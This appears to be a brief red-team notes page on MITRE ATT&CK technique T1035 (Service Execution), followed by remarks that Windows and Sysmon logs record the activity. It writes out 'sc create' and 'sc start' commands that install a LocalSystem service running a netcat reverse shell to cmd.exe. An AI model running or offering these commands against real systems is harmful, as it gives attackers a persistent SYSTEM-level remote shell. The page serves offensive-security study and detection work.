Skip to content

T1035: Service Execution


Creating an evil service with a netcat reverse shell:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

C:\> sc create evilsvc binpath= "c:\tools\nc 443 -e cmd.exe" start= "auto" obj= "LocalSystem" password= ""
[SC] CreateService SUCCESS
C:\> sc start evilsvc
{% endcode-tabs-item %} {% endcode-tabs %}


The reverse shell lives under services.exe as expected:

Windows security, application, Service Control Manager and sysmon logs provide some juicy details:


{% embed url="" %}